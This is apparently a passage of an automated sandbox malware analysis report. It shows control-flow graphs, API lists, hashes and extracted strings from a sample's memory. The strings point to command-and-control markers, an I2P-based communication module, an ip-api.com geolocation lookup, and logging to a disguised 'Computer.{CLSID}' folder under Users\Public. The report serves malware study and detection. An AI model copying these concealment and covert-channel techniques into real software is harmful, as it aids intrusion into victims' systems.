                    control_flow_graph 1035 7ff8bfb8330e-7ff8bfb8332e 1036 7ff8bfb8339c-7ff8bfb833a4 1035->1036 1037 7ff8bfb83330-7ff8bfb83338 1035->1037 1040 7ff8bfb833b7-7ff8bfb833cd call 7ff8bfb8464b 1036->1040 1041 7ff8bfb833a6-7ff8bfb833ab 1036->1041 1038 7ff8bfb8333a-7ff8bfb83341 1037->1038 1039 7ff8bfb83347-7ff8bfb8334f 1037->1039 1038->1039 1043 7ff8bfb8379b-7ff8bfb837b5 call 7ff8bfb8464b 1038->1043 1044 7ff8bfb83a6f 1039->1044 1045 7ff8bfb83355-7ff8bfb8335d 1039->1045 1049 7ff8bfb83a74-7ff8bfb83a85 1040->1049 1046 7ff8bfb833ad-7ff8bfb833b2 1041->1046 1047 7ff8bfb833d2-7ff8bfb833d7 1041->1047 1043->1039 1061 7ff8bfb837bb-7ff8bfb837c3 1043->1061 1044->1049 1053 7ff8bfb8335f-7ff8bfb83366 1045->1053 1054 7ff8bfb83372-7ff8bfb8337d 1045->1054 1046->1049 1051 7ff8bfb833d9-7ff8bfb833df 1047->1051 1052 7ff8bfb83406-7ff8bfb8358e call 7ff8bfb82800 call 7ff8bfb84170 call 7ff8bfb88684 1047->1052 1051->1052 1056 7ff8bfb833e1-7ff8bfb83401 1051->1056 1091 7ff8bfb83594-7ff8bfb835c0 call 7ff8bfb84170 call 7ff8bfb88684 1052->1091 1092 7ff8bfb83701-7ff8bfb83730 call 7ff8bfb85fd5 1052->1092 1053->1054 1058 7ff8bfb83368-7ff8bfb83370 1053->1058 1059 7ff8bfb83a86-7ff8bfb83a8b 1054->1059 1060 7ff8bfb83383-7ff8bfb8338c 1054->1060 1056->1049 1058->1054 1058->1060 1059->1049 1063 7ff8bfb83915-7ff8bfb8393b 1060->1063 1064 7ff8bfb83392-7ff8bfb83397 1060->1064 1067 7ff8bfb8384f-7ff8bfb8386a call 7ff8bfb8464b call 7ff8bfb82f80 1061->1067 1068 7ff8bfb837c9-7ff8bfb837da 1061->1068 1065 7ff8bfb83a8d-7ff8bfb83a92 1063->1065 1066 7ff8bfb83941-7ff8bfb83948 1063->1066 1064->1049 1065->1049 1071 7ff8bfb8394a-7ff8bfb83954 1066->1071 1072 7ff8bfb83957-7ff8bfb8397d GetProcessHeap HeapAlloc 1066->1072 1067->1049 1073 7ff8bfb837dc-7ff8bfb837f3 1068->1073 1074 7ff8bfb837f5-7ff8bfb837fe 1068->1074 1071->1072 1077 7ff8bfb8397f-7ff8bfb839c1 memcpy call 7ff8bfb8aa07 1072->1077 1078 7ff8bfb839f1-7ff8bfb83a0c call 7ff8bfb81292 1072->1078 1073->1067 1073->1074 1074->1067 1079 7ff8bfb83800-7ff8bfb83808 1074->1079 1097 7ff8bfb839c7 1077->1097 1098 7ff8bfb83a60-7ff8bfb83a63 1077->1098 1078->1049 1083 7ff8bfb8381d-7ff8bfb83828 1079->1083 1084 7ff8bfb8380a-7ff8bfb83811 1079->1084 1093 7ff8bfb8386f call 7ff8bfb8305e 1083->1093 1094 7ff8bfb8382a-7ff8bfb83832 1083->1094 1084->1083 1090 7ff8bfb83813-7ff8bfb8381b 1084->1090 1090->1083 1090->1094 1122 7ff8bfb8374e-7ff8bfb8377d call 7ff8bfb85fd5 1091->1122 1123 7ff8bfb835c6-7ff8bfb835d2 call 7ff8bfb84692 1091->1123 1092->1091 1112 7ff8bfb83736-7ff8bfb83749 call 7ff8bfb8ed50 1092->1112 1103 7ff8bfb83874-7ff8bfb83879 1093->1103 1100 7ff8bfb8387e-7ff8bfb83898 call 7ff8bfb8464b 1094->1100 1101 7ff8bfb83834-7ff8bfb8384a call 7ff8bfb8464b 1094->1101 1105 7ff8bfb839cc-7ff8bfb839cf 1097->1105 1107 7ff8bfb83a22-7ff8bfb83a24 1098->1107 1120 7ff8bfb8389a-7ff8bfb8389f 1100->1120 1121 7ff8bfb838a4-7ff8bfb83910 call 7ff8bfb82800 call 7ff8bfb8464b call 7ff8bfb89c52 1100->1121 1101->1049 1103->1049 1105->1049 1114 7ff8bfb839d5-7ff8bfb839ec GetProcessHeap HeapFree 1105->1114 1110 7ff8bfb83a26-7ff8bfb83a2e 1107->1110 1111 7ff8bfb83a35-7ff8bfb83a44 call 7ff8bfb8aa84 1107->1111 1110->1111 1117 7ff8bfb83a30-7ff8bfb83a33 1110->1117 1111->1097 1130 7ff8bfb83a46-7ff8bfb83a54 call 7ff8bfb832a5 1111->1130 1112->1091 1114->1049 1117->1111 1124 7ff8bfb83a0e-7ff8bfb83a1e call 7ff8bfb8aaf5 1117->1124 1120->1049 1121->1049 1122->1123 1142 7ff8bfb83783-7ff8bfb83796 call 7ff8bfb8ed50 1122->1142 1139 7ff8bfb835d4-7ff8bfb835e9 1123->1139 1140 7ff8bfb835f1-7ff8bfb83607 call 7ff8bfb84818 1123->1140 1124->1107 1146 7ff8bfb83a56-7ff8bfb83a5b 1130->1146 1147 7ff8bfb83a65-7ff8bfb83a6a 1130->1147 1139->1140 1151 7ff8bfb8362c-7ff8bfb83673 call 7ff8bfb8ac80 1140->1151 1152 7ff8bfb83609-7ff8bfb83625 1140->1152 1142->1123 1146->1105 1147->1105 1155 7ff8bfb836a7-7ff8bfb836af 1151->1155 1156 7ff8bfb83675-7ff8bfb8367d 1151->1156 1152->1151 1157 7ff8bfb836c8-7ff8bfb836fc call 7ff8bfb89c52 1155->1157 1158 7ff8bfb836b1-7ff8bfb836c2 GetProcessHeap HeapFree 1155->1158 1156->1155 1159 7ff8bfb8367f-7ff8bfb8369a call 7ff8bfb81770 1156->1159 1157->1049 1158->1157 1159->1155 1164 7ff8bfb8369c-7ff8bfb836a0 1159->1164 1164->1155
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID:
                    • String ID: $--TSCB--$-ILCCNC-$-ILCCNC-$-ILCCNC-$-VRSCNC-$/line?fields=query$AKAK$AKAK$KCIT$TGER$TPCR$[E] (%s) -> Memory allocation failed(size=%llu)$curl/8.4.0$h$ip-api.com$last-patch$mem_alloc$referrer
                    • API String ID: 0-3139374006
                    • Opcode ID: a59f30150775796cf729d42dacd5df686f13eafd5d338df122460e0b1b621434
                    • Instruction ID: fad7b1b2de246126d52592ebaaa2794690377ae170ecaacc6295d77309f1d893
                    • Opcode Fuzzy Hash: a59f30150775796cf729d42dacd5df686f13eafd5d338df122460e0b1b621434
                    • Instruction Fuzzy Hash: 3F124C72A0C68286EB608B9DE4803B9B7A0EB887D4F544235DB9D477E6DF7CE554CB00
                    Function 00007FF8BFB88760 Relevance: 37.7, APIs: 9, Strings: 16, Instructions: 167stringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: strlen$strcat$HandleLibraryLoadModule
                    • String ID: --conf=$--datadi$--reseed$.file=$C_InitI2P$C_StartI2P$Done$[E] (%s) -> Failed(err=%08x)$[I] (%s) -> %s$i2p$i2p$i2p.conf$i2p.su3$i2p.su3$i2p_init$libi2p.dll
                    • API String ID: 1893813203-492052463
                    • Opcode ID: ca066c6045d2f2a4322d3373cf1fe784a61079aaa6ce0be1ffd8e7fa4d20b0cc
                    • Instruction ID: 105556b51660528c26000f71e2e3f01d013de8393248e407d63bcaaaab8658c6
                    • Opcode Fuzzy Hash: ca066c6045d2f2a4322d3373cf1fe784a61079aaa6ce0be1ffd8e7fa4d20b0cc
                    • Instruction Fuzzy Hash: 3B719C31A1DB8392EB219B99E4803FA6395EB887C0F845131DB4D4BB9AEF3CD905C740
                    Function 00007FF8BFB5317C Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139stringfileCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                    • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$dwlmgr.l$log$~
                    • API String ID: 3395718042-2859552336
                    • Opcode ID: 27ea5ecb8930a5d572a67ee6d818b6b1525ff907abdc708875468967654232a4
                    • Instruction ID: 2bdc8611c17d197b602f3bddae61beebac0a91e13cdcc8640771f7311e5a3bda
                    • Opcode Fuzzy Hash: 27ea5ecb8930a5d572a67ee6d818b6b1525ff907abdc708875468967654232a4
                    • Instruction Fuzzy Hash: FE514012E1C707A2FA206BDDA8A43BC7352AF557C4F584032CB0D46BA2DEADB956C341
                    Function 00007FF8BFB8143C Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139stringfileCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                    • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$cnccli.l$debug_init$log$~
                    • API String ID: 3395718042-315528054
                    • Opcode ID: 602e9c047fdca86cbadb0e5c23cdcfb60371812318e93288b996e6c907137449
                    • Instruction ID: f429e8a65ea131e304848889b0689bfcdaa34c7f643bb8ab0c88b0ac273ec320
                    • Opcode Fuzzy Hash: 602e9c047fdca86cbadb0e5c23cdcfb60371812318e93288b996e6c907137449
                    • Instruction Fuzzy Hash: 3E514960E1E70386FB649BDDE8903F82354AF897C4F548032DB4E466A7DE6CA996C341
                    Function 00007FF8B915143C Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139stringfileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1207 7ff8b915143c-7ff8b9151464 InitializeCriticalSectionAndSpinCount 1208 7ff8b915146a-7ff8b915149e call 7ff8b915cc60 call 7ff8b9158ff1 1207->1208 1209 7ff8b9151590-7ff8b91515b1 GetLastError call 7ff8b9151292 1207->1209 1222 7ff8b9151569-7ff8b9151581 call 7ff8b9151292 1208->1222 1223 7ff8b91514a4-7ff8b91514bb strlen 1208->1223 1215 7ff8b91515d2-7ff8b91515d8 1209->1215 1216 7ff8b91515b3 1209->1216 1220 7ff8b91515de-7ff8b91515e4 1215->1220 1221 7ff8b915169b 1215->1221 1218 7ff8b91515b9-7ff8b91515c6 1216->1218 1219 7ff8b9151691-7ff8b9151696 1216->1219 1218->1215 1219->1222 1224 7ff8b91515e6-7ff8b91515ec 1220->1224 1225 7ff8b9151610-7ff8b9151613 1220->1225 1226 7ff8b91516a5-7ff8b91516aa 1221->1226 1236 7ff8b9151586-7ff8b915158f 1222->1236 1230 7ff8b91514bd-7ff8b91514c0 1223->1230 1231 7ff8b91514d3-7ff8b91514d6 1223->1231 1232 7ff8b91516b9-7ff8b91516be 1224->1232 1233 7ff8b91515f2-7ff8b91515f8 1224->1233 1227 7ff8b915162d-7ff8b9151633 1225->1227 1228 7ff8b9151615-7ff8b9151618 1225->1228 1226->1222 1237 7ff8b91516af 1227->1237 1238 7ff8b9151635-7ff8b915163a 1227->1238 1234 7ff8b915161a-7ff8b915161d 1228->1234 1235 7ff8b9151687 1228->1235 1230->1231 1239 7ff8b91514c2-7ff8b91514cf strlen 1230->1239 1240 7ff8b91514f8-7ff8b9151541 strlen fopen 1231->1240 1241 7ff8b91514d8-7ff8b91514f2 strcat strlen 1231->1241 1232->1222 1242 7ff8b91515fe-7ff8b9151604 1233->1242 1243 7ff8b91516c3-7ff8b91516c8 1233->1243 1234->1226 1246 7ff8b9151623-7ff8b9151628 1234->1246 1235->1219 1237->1232 1238->1222 1239->1231 1247 7ff8b915165d-7ff8b9151678 call 7ff8b9151292 1240->1247 1248 7ff8b9151547-7ff8b9151563 call 7ff8b9151292 1240->1248 1241->1240 1244 7ff8b915163f-7ff8b9151644 1242->1244 1245 7ff8b9151606-7ff8b915160b 1242->1245 1243->1222 1244->1222 1245->1222 1246->1222 1247->1222 1248->1222 1253 7ff8b91516cd-7ff8b91516e7 call 7ff8b9151292 1248->1253 1253->1236
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                    • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$samctl.l$~
                    • API String ID: 3395718042-1297835036
                    • Opcode ID: 1150151ec345bf13c3b31c0e9be5a53ea1ef8a6f05555bc19399344b667da666
                    • Instruction ID: e442ea59e8dc304b59acd59e54db474d07a9e0df6202cd59620257942e7cc784
                    • Opcode Fuzzy Hash: 1150151ec345bf13c3b31c0e9be5a53ea1ef8a6f05555bc19399344b667da666
                    • Instruction Fuzzy Hash: 10517050E1C7D385FA229F0DB8A03B81255AF467C4F958432DB0E5A6D2DEACF946F341
                    Function 00007FF8BFABA3AC Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139stringfileCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                    • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$evtsrv.l$log$~
                    • API String ID: 3395718042-190452282
                    • Opcode ID: 812d47fff8b64de28eadb4b284417ff33b11a0d1b38bd8777733dc5e58d56bcb
                    • Instruction ID: 5cc94355ab67ef999a51a796717c92ce8426d050c0503c75da9e02fc1efa18ab
                    • Opcode Fuzzy Hash: 812d47fff8b64de28eadb4b284417ff33b11a0d1b38bd8777733dc5e58d56bcb
                    • Instruction Fuzzy Hash: EF516C51A0CA1795FA289BDCA8873B89394AF057CCF407132CF4E466A3DE6DB94A9301
                    Function 00007FF8BA50143C Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139stringfileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1305 7ff8ba50143c-7ff8ba501464 InitializeCriticalSectionAndSpinCount 1306 7ff8ba501590-7ff8ba5015b1 GetLastError call 7ff8ba501292 1305->1306 1307 7ff8ba50146a-7ff8ba50149e call 7ff8ba509cc0 call 7ff8ba506dd1 1305->1307 1313 7ff8ba5015b3 1306->1313 1314 7ff8ba5015d2-7ff8ba5015d8 1306->1314 1320 7ff8ba5014a4-7ff8ba5014bb strlen 1307->1320 1321 7ff8ba501569-7ff8ba501581 call 7ff8ba501292 1307->1321 1316 7ff8ba501691-7ff8ba501696 1313->1316 1317 7ff8ba5015b9-7ff8ba5015c6 1313->1317 1318 7ff8ba5015de-7ff8ba5015e4 1314->1318 1319 7ff8ba50169b 1314->1319 1316->1321 1317->1314 1322 7ff8ba5015e6-7ff8ba5015ec 1318->1322 1323 7ff8ba501610-7ff8ba501613 1318->1323 1328 7ff8ba5016a5-7ff8ba5016aa 1319->1328 1324 7ff8ba5014d3-7ff8ba5014d6 1320->1324 1325 7ff8ba5014bd-7ff8ba5014c0 1320->1325 1339 7ff8ba501586-7ff8ba50158f 1321->1339 1326 7ff8ba5015f2-7ff8ba5015f8 1322->1326 1327 7ff8ba5016b9-7ff8ba5016be 1322->1327 1329 7ff8ba501615-7ff8ba501618 1323->1329 1330 7ff8ba50162d-7ff8ba501633 1323->1330 1333 7ff8ba5014f8-7ff8ba501541 strlen fopen 1324->1333 1334 7ff8ba5014d8-7ff8ba5014f2 strcat strlen 1324->1334 1325->1324 1332 7ff8ba5014c2-7ff8ba5014cf strlen 1325->1332 1335 7ff8ba5016c3-7ff8ba5016c8 1326->1335 1336 7ff8ba5015fe-7ff8ba501604 1326->1336 1327->1321 1328->1321 1337 7ff8ba501687 1329->1337 1338 7ff8ba50161a-7ff8ba50161d 1329->1338 1340 7ff8ba501635-7ff8ba50163a 1330->1340 1341 7ff8ba5016af 1330->1341 1332->1324 1342 7ff8ba501547-7ff8ba501563 call 7ff8ba501292 1333->1342 1343 7ff8ba50165d-7ff8ba501678 call 7ff8ba501292 1333->1343 1334->1333 1335->1321 1344 7ff8ba501606-7ff8ba50160b 1336->1344 1345 7ff8ba50163f-7ff8ba501644 1336->1345 1337->1316 1338->1328 1346 7ff8ba501623-7ff8ba501628 1338->1346 1340->1321 1341->1327 1342->1321 1351 7ff8ba5016cd-7ff8ba5016e7 call 7ff8ba501292 1342->1351 1343->1321 1344->1321 1345->1321 1346->1321 1351->1339
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    • Associated: 00000016.00000002.4543016103.00007FF8BA500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543075522.00007FF8BA513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543104552.00007FF8BA51C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543126131.00007FF8BA51F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543151844.00007FF8BA520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                    • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$prgmgr.l$~
                    • API String ID: 3395718042-2735303109
                    • Opcode ID: b880186cb09fe9418d3488624d1c28ca1e4f32ba72a4e66950c71ccbecef1740
                    • Instruction ID: bd1cf26413e85b095482649eefaab0330385fecad357a035b070aad4dcf00b4b
                    • Opcode Fuzzy Hash: b880186cb09fe9418d3488624d1c28ca1e4f32ba72a4e66950c71ccbecef1740
                    • Instruction Fuzzy Hash: 18511A60E0C603C6FA6097DDACD03BA1294BF177C4F9440B7DF0E4A6A2DE6DAB458742
                    Function 00007FF8B918143C Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139stringfileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1256 7ff8b918143c-7ff8b9181464 InitializeCriticalSectionAndSpinCount 1257 7ff8b918146a-7ff8b918149e call 7ff8b9181770 call 7ff8b918e0f1 1256->1257 1258 7ff8b9181590-7ff8b91815b1 GetLastError call 7ff8b9181292 1256->1258 1271 7ff8b9181569-7ff8b9181581 call 7ff8b9181292 1257->1271 1272 7ff8b91814a4-7ff8b91814bb strlen 1257->1272 1264 7ff8b91815b3 1258->1264 1265 7ff8b91815d2-7ff8b91815d8 1258->1265 1267 7ff8b91815b9-7ff8b91815c6 1264->1267 1268 7ff8b9181691-7ff8b9181696 1264->1268 1269 7ff8b91815de-7ff8b91815e4 1265->1269 1270 7ff8b918169b 1265->1270 1267->1265 1268->1271 1273 7ff8b91815e6-7ff8b91815ec 1269->1273 1274 7ff8b9181610-7ff8b9181613 1269->1274 1279 7ff8b91816a5-7ff8b91816aa 1270->1279 1283 7ff8b9181586-7ff8b918158f 1271->1283 1275 7ff8b91814bd-7ff8b91814c0 1272->1275 1276 7ff8b91814d3-7ff8b91814d6 1272->1276 1277 7ff8b91816b9-7ff8b91816be 1273->1277 1278 7ff8b91815f2-7ff8b91815f8 1273->1278 1280 7ff8b918162d-7ff8b9181633 1274->1280 1281 7ff8b9181615-7ff8b9181618 1274->1281 1275->1276 1286 7ff8b91814c2-7ff8b91814cf strlen 1275->1286 1287 7ff8b91814f8-7ff8b9181541 strlen fopen 1276->1287 1288 7ff8b91814d8-7ff8b91814f2 strcat strlen 1276->1288 1277->1271 1289 7ff8b91815fe-7ff8b9181604 1278->1289 1290 7ff8b91816c3-7ff8b91816c8 1278->1290 1279->1271 1284 7ff8b91816af 1280->1284 1285 7ff8b9181635-7ff8b918163a 1280->1285 1291 7ff8b918161a-7ff8b918161d 1281->1291 1292 7ff8b9181687 1281->1292 1284->1277 1285->1271 1286->1276 1294 7ff8b918165d-7ff8b9181678 call 7ff8b9181292 1287->1294 1295 7ff8b9181547-7ff8b9181563 call 7ff8b9181292 1287->1295 1288->1287 1296 7ff8b918163f-7ff8b9181644 1289->1296 1297 7ff8b9181606-7ff8b918160b 1289->1297 1290->1271 1291->1279 1293 7ff8b9181623-7ff8b9181628 1291->1293 1292->1268 1293->1271 1294->1271 1295->1271 1302 7ff8b91816cd-7ff8b91816e7 call 7ff8b9181292 1295->1302 1296->1271 1297->1271 1302->1283
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    • Associated: 00000016.00000002.4542850884.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542909887.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542940731.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542967259.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542988009.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                    • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$rdpctl.l$~
                    • API String ID: 3395718042-1794035234
                    • Opcode ID: 8b2556d2579fb226d3b412aa444ad6ae0953bae4d5ef3f896a350effe941be9c
                    • Instruction ID: ace710477b1c52a3946b0cc539d886116048bd28471fdfb5dc040c43a8f0adef
                    • Opcode Fuzzy Hash: 8b2556d2579fb226d3b412aa444ad6ae0953bae4d5ef3f896a350effe941be9c
                    • Instruction Fuzzy Hash: 5A516092E0C7C381FA609F5DA8C03B91355AF067D4F9A8432DB4E06297DE6DA946F341
                    Function 00007FF8BFB59702 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246registryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
